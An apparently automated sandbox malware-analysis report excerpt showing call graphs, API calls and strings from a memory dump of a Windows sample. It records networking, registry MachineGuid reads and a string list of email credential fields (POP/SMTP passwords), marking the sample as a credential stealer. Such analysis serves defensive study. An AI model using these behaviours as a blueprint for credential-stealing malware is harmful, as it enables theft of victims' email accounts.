8068->8069 8070 4030a5 3 API calls 8068->8070 8071 403224 8070->8071 8071->8067 8071->8069 8084 402ca4 8072->8084 8074 4030b0 8075 4030b5 8074->8075 8088 4030c4 8074->8088 8075->8071 8079 40326d 8078->8079 8083 4032b7 8079->8083 8097 402b7c GetProcessHeap RtlAllocateHeap 8079->8097 8081 40328c 8082 402b7c 2 API calls 8081->8082 8082->8083 8083->8068 8085 403079 8084->8085 8087 40307c 8085->8087 8092 40317b GetPEB 8085->8092 8087->8074 8089 4030eb 8088->8089 8091 4030c0 8089->8091 8094 402c03 8089->8094 8091->8071 8093 40319b 8092->8093 8093->8087 8095 4031e5 3 API calls 8094->8095 8096 402c15 8095->8096 8096->8091 8098 402b98 8097->8098 8098->8081 8102 4139de 8111 413855 8102->8111 8104 4139f1 8105 413838 GetProcessHeap RtlAllocateHeap GetPEB 8104->8105 8108 4139f7 8105->8108 8106 413866 21 API calls 8107 413a2d 8106->8107 8109 413b81 GetProcessHeap RtlAllocateHeap GetPEB ExitProcess 8107->8109 8108->8106 8110 413a34 8109->8110 8112 4031e5 3 API calls 8111->8112 8113 413864 8112->8113 8113->8113 8057 404df3 WSAStartup 10650 40f980 10663 413c87 10650->10663 10652 40fa19 10653 40fa08 10654 402bab 2 API calls 10653->10654 10654->10652 10655 40f993 10655->10652 10655->10653 10685 4060bd 10655->10685 10660 412093 6 API calls 10661 40f9f6 10660->10661 10662 412093 6 API calls 10661->10662 10662->10653 10703 413d97 10663->10703 10666 404056 5 API calls 10668 413cad 10666->10668 10667 413c9f 10667->10655 10668->10667 10669 405b6f 5 API calls 10668->10669 10671 413d10 10669->10671 10670 413d7b 10674 402bab 2 API calls 10670->10674 10671->10670 10672 403c62 3 API calls 10671->10672 10673 413d1f 10672->10673 10673->10670 10675 413d5a 10673->10675 10676 413d2c 10673->10676 10674->10667 10678 405b6f 5 API calls 10675->10678 10677 405dc5 3 API calls 10676->10677 10679 413d33 10677->10679 10680 413d55 10678->10680 10679->10680 10682 405b6f 5 API calls 10679->10682 10681 402bab 2 API calls 10680->10681 10681->10670 10683 413d48 10682->10683 10684 402bab 2 API calls 10683->10684 10684->10680 10686 4031e5 3 API calls 10685->10686 10687 4060dd 10686->10687 10688 406126 10687->10688 10689 4031e5 3 API calls 10687->10689 10688->10653 10692 40650a 10688->10692 10690 40610f 10689->10690 10766 40604f 10690->10766 10693 4060ac 3 API calls 10692->10693 10694 406519 10693->10694 10695 4031e5 3 API calls 10694->10695 10696 406529 10695->10696 10697 406599 10696->10697 10698 4031e5 3 API calls 10696->10698 10697->10660 10699 406544 10698->10699 10700 40657f 10699->10700 10702 4031e5 3 API calls 10699->10702 10701 403c40 3 API calls 10700->10701 10701->10697 10702->10700 10704 413da0 10703->10704 10707 413c96 10703->10707 10709 4065a2 10704->10709 10707->10666 10707->10667 10708 405dc5 3 API calls 10708->10707 10724 404a52 10709->10724 10711 406638 10711->10707 10711->10708 10712 4065c0 10712->10711 10736 40393f 10712->10736 10715 406631 10716 402bab 2 API calls 10715->10716 10716->10711 10717 4059d8 3 API calls 10718 4065e9 10717->10718 10720 402b7c 2 API calls 10718->10720 10723 40662a 10718->10723 10719 402bab 2 API calls 10719->10715 10721 4065f8 10720->10721 10722 402bab 2 API calls 10721->10722 10722->10723 10723->10719 10725 402b7c 2 API calls 10724->10725 10727 404a65 10725->10727 10726 404ac6 10726->10712 10727->10726 10728 4031e5 3 API calls 10727->10728 10729 404a8a RegOpenKeyExA 10728->10729 10730 404aa0 10729->10730 10731 404aca 10729->10731 10732 4031e5 3 API calls 10730->10732 10733 402bab 2 API calls 10731->10733 10734 404ab1 RegQueryValueExA 10732->10734 10733->10726 10735 404a39 4 API calls 10734->10735 10735->10726 10743 403843 10736->10743 10739 403969 10739->10715 10739->10717 10741 403961 10742 402bab 2 API calls 10741->10742 10742->10739 10744 403861 10743->10744 10745 402b7c 2 API calls 10744->10745 10747 403875 10745->10747 10746 403923 10746->10739 10762 403aef 10746->10762 10747->10746 10748 4031e5 3 API calls 10747->10748 10749 40389b 10748->10749 10749->10746 10750 4031e5 3 API calls 10749->10750 10751 4038c5 10750->10751 10752 40392a 10751->10752 10754 403666 3 API calls 10751->10754 10753 403649 3 API calls 10752->10753 10753->10746 10755 4038e7 10754->10755 10755->10752 10756 4031e5 3 API calls 10755->10756 10757 403901 10756->10757 10757->10752 10758 403911 10757->10758 10759 40362f 3 API calls 10758->10759 10760 403919 10759->10760 10761 403649 3 API calls 10760->10761 10761->10746 10763 403afc 10762->10763 10764 402b7c 2 API calls 10763->10764 10765 403b16 10764->10765 10765->10741 10767 4031e5 3 API calls 10766->10767 10768 406062 10767->10768 10768->10688

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 54 402b7c-402b96 GetProcessHeap RtlAllocateHeap 55 402ba6-402baa 54->55 56 402b98-402ba3 call 402b4e 54->56 56->55
                                                                                      APIs
                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocateProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1357844191-0
                                                                                      • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                                      • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                                                      • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                                      • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                                                      • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                                                      • GetLastError.KERNEL32 ref: 0041399E
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Error$CreateLastModeMutex
                                                                                      • String ID:
                                                                                      • API String ID: 3448925889-0
                                                                                      • Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                                                                                      • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                                                      • Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                                                                                      • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                      • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                                                      • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocateOpenProcessQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 1425999871-0
                                                                                      • Opcode ID: 61234e47739be8c7060a32ecdecb60308da47ea11066a787c608e0506b8bf0d5
                                                                                      • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                                                      • Opcode Fuzzy Hash: 61234e47739be8c7060a32ecdecb60308da47ea11066a787c608e0506b8bf0d5
                                                                                      • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 87 404df3-404e16 WSAStartup
                                                                                      APIs
                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Startup
                                                                                      • String ID:
                                                                                      • API String ID: 724789610-0
                                                                                      • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                                      • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                                                      • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                                      • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 88 402c1f-402c37 call 4031e5 LoadLibraryW
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                                                                                      • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                                                      • Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                                                                                      • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 91 413a3f-413a57 call 4031e5 ExitProcess
                                                                                      APIs
                                                                                      • ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID:
                                                                                      • API String ID: 621844428-0
                                                                                      • Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                                                                                      • Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
                                                                                      • Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                                                                                      • Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 94 4049ff-404a18 call 4031e5 RegCloseKey
                                                                                      APIs
                                                                                      • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID:
                                                                                      • API String ID: 3535843008-0
                                                                                      • Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                                                                                      • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                                                      • Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                                                                                      • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 0040438F
                                                                                      • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                                                      • VariantInit.OLEAUT32(?), ref: 004043C4
                                                                                      • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                                                      • VariantInit.OLEAUT32(?), ref: 00404414
                                                                                      • SysAllocString.OLEAUT32(?), ref: 00404419
                                                                                      • VariantInit.OLEAUT32(?), ref: 00404431
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                                                      • String ID:
                                                                                      • API String ID: 1312198159-0
                                                                                      • Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                                                                                      • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                                                      • Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                                                                                      • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                                                      • API String ID: 0-2111798378
                                                                                      • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                                                      • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                                                      • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                                                      • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                                                                      APIs
                                                                                      • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: recv
                                                                                      • String ID:
                                                                                      • API String ID: 1507349165-0
                                                                                      • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                                                      • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                                                                      • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                                                      • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                                      • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                                                                      • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                                      • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _wmemset$ErrorLast
                                                                                      • String ID: IDA$IDA
                                                                                      • API String ID: 887189805-2020647798
                                                                                      • Opcode ID: 8c9f743a95e2ed60ca48ebb2a141374e00de6ead3e6b7acbc24c92b4cfb516c3
                                                                                      • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                                                      • Opcode Fuzzy Hash: 8c9f743a95e2ed60ca48ebb2a141374e00de6ead3e6b7acbc24c92b4cfb516c3
                                                                                      • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                                                                      APIs
                                                                                      • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                                                      • socket.WS2_32(?,?,?), ref: 00404E7A
                                                                                      • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: freeaddrinfogetaddrinfosocket
                                                                                      • String ID:
                                                                                      • API String ID: 2479546573-0
                                                                                      • Opcode ID: 97c05e97c8173f6be26ae818b5776147fb3e9d7db23be9392c32e12bab91489d
                                                                                      • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                                                      • Opcode Fuzzy Hash: 97c05e97c8173f6be26ae818b5776147fb3e9d7db23be9392c32e12bab91489d
                                                                                      • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98